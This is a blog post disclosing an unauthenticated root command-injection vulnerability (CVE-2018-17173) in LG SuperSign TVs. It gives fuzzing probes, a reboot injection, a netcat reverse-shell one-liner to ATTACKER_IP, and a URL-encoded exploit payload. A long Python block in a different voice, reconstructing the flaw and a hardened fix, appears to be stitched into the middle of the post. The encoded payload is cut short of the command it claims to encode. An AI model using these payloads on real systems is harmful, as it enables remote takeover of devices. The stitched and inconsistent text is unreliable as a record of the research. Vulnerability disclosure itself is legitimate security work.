Wednesday, 19 September 2018

LG SuperSign RCE! (to the 'luna' and back to shell)

Publishing the previous vulnerabilities in LG SuperSign TVs left a bad taste in my mouth, something like "I know there must be something more". So I continued with the research and finally found the precious RCE.

This vulnerability has been assigned CVE-2018-17173.

The vuln

Playing with the app through Burp, I saw a URL with some parameters. This URL is requested when the application needs to load the thumbnails of the images the user has uploaded.

So I started fuzzing those parameters with ZAP until I found something interesting:

When the sourceUri parameter received the value "' or 1 --'", the application responded with the help screen of a utility called luna-send. It looked as if my input was being dropped into a command that invoked this utility, and the command was failing on an unexpected parameter. Trimming the input down, I found that the value ' - was enough to get the same response. I knew I was close.

When you see something like that in a response, you immediately start playing with things like ;command, ;command; and so on. After a few failed attempts I tried ' -;reboot;' and watched the TV reboot. The RCE was knocking on my door.
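To make the mechanism behind those probes concrete, here is an added example (my own code, not the post's and not anything from the TV's firmware). It reconstructs the injectable pattern the observed behaviour points at, a request parameter dropped into a single-quoted position of a shell command line, and shows how ' -;reboot;' splits that line into two commands, next to a hardened form that validates the value and passes it as a single argv element with no shell. The luna-send service URI and arguments are placeholders; the real ones are not known from the post.

```python
import re
import shlex

# Assumed placeholder: the real luna-send service and arguments used by
# the SuperSign thumbnail handler are not known from the post.
SERVICE_URI = "luna://com.example.thumbnail/get"


def vulnerable_command(source_uri: str) -> str:
    """Reconstruction of the injectable pattern: the request parameter is
    spliced into a single-quoted slot of a command string handed to a shell."""
    return f"luna-send -n 1 {SERVICE_URI} '{source_uri}'"


def shell_words(cmd: str) -> list:
    """Tokenise a command line roughly as /bin/sh would, keeping ; | & < > ( )
    as their own tokens so command boundaries stay visible."""
    lex = shlex.shlex(cmd, posix=True, punctuation_chars=True)
    lex.whitespace_split = True
    return list(lex)


def injected_commands(cmd: str) -> list:
    """Split the tokenised line at ';' into the separate commands the shell
    would run; a clean input yields exactly one command."""
    commands, current = [], []
    for tok in shell_words(cmd):
        if tok == ";":
            commands.append(current)
            current = []
        else:
            current.append(tok)
    commands.append(current)
    return [c for c in commands if any(c)]  # drop empty commands like ['']


# Assumed validation policy for the hardened handler: only characters that
# can appear in a local or file:// style URI, and no leading '-' so the
# value can never be read as an option by the utility.
URI_ALLOWED = re.compile(r"[A-Za-z0-9._~:/%-]+")


def safe_argv(source_uri: str) -> list:
    """Hardened form: validate, then pass the value as ONE argv element.
    Run it with subprocess.run(safe_argv(value)); never through a shell."""
    if not URI_ALLOWED.fullmatch(source_uri):
        raise ValueError("sourceUri contains characters outside the allowlist")
    if source_uri.startswith("-"):
        raise ValueError("sourceUri must not look like a command-line option")
    return ["luna-send", "-n", "1", SERVICE_URI, source_uri]


if __name__ == "__main__":
    for probe in ("file:///tmp/img.png", "' -;reboot;'"):
        print(repr(probe), "->", injected_commands(vulnerable_command(probe)))
```

With the benign value the tokeniser returns a single command. With ' -;reboot;' the first command ends up with an empty string plus a bare - as arguments (the unexpected parameter that produced the help screen) and reboot becomes a second command, which is exactly what the post observed. The probe ' - on its own leaves a quote unbalanced; in the real command it was absorbed by whatever followed the parameter, which this reconstruction does not know, so it is not modelled here.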

Getting a Shell

Thanks to the LFI, I already knew the TV had a netcat binary (I had downloaded it that way), but it was a version that does not support the -e option, so I used the usual alternative:

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc ATTACKER_IP PORT >/tmp/f

All of it URL-encoded so it could be passed in the URL.


So, the payload was ready:

' -;rm%20%2Ftmp%2Ff%3Bmkfifo%20%2Ftmp%2Ff%3Bcat%20%2Ftmp%2Ff%7C%2Fbin%2Fsh%20-i

Putting it all together:


I launched netcat to catch the shell, made the request and...


I was in.

In a few days I'll be updating this post with more technical details. 
That is all for now.

Points to take into account:

-No authentication is needed
-No privilege escalation is needed (the app runs as root)